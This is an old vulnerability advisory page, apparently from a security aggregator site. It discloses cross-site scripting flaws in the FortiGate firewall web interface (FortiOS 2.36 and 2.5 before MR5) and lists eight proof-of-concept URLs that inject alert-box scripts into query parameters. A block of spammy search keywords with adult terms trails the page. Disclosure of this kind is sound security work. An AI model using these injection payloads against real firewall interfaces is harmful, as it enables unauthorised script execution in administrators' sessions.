about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities


Title FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities
Published 2003-11-12-12:00AM
Updated 2003-11-12-11:14PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to "Maarten Hartsuijker" <maartenh@phreaker.net>.
Vulnerable  Fortinet FortiOS 2.36
Fortinet FortiOS 2.5 0MR4
Fortinet FortiOS 2.5
Not Vulnerable  Fortinet FortiOS 2.50 MR5
Code   The following examples were provided:

https://www.example.com/firewall/policy/dlg?q=-1&fzone=t<script>alert('oops')</script>>&tzone=dmz

https://www.example.com/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('oops')</script>

https://www.example.com/antispam/listdel?file=blacklist&name=b<script>alert('oops')</script>&startline=0

https://www.example.com/antispam/listdel?file=whitelist&name=a<script>alert('oops')</script>&startline=0(naturally)

http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session

http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 14:17:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.taogu9 Buck video php platin poisoning Www.Mobile pussy maxcpm.inf www.family www.gzsang Crack 1ce1 www.qsyfoo sex.sex c...nts/co WWW.sexey. Sandra used exerc Sanya.imag php-nuke 2 www.ebuyba honeymoon www xnxx s picture se sexyvedio maxcpm.inf www.wxdume 200 ///con Www.sexygi php maxcpm.inf www.mqdm.n 3773 www nudeph www.siaaa. MAKING LOV www.sjjjfw jacl www.trish maxcpm.inf colegi www.94dyy. joffwe sex vedio s...ticles Mp3 englis thudam.com smubugil mambo Remo phpNuke ph www.v6sf.c p..._conve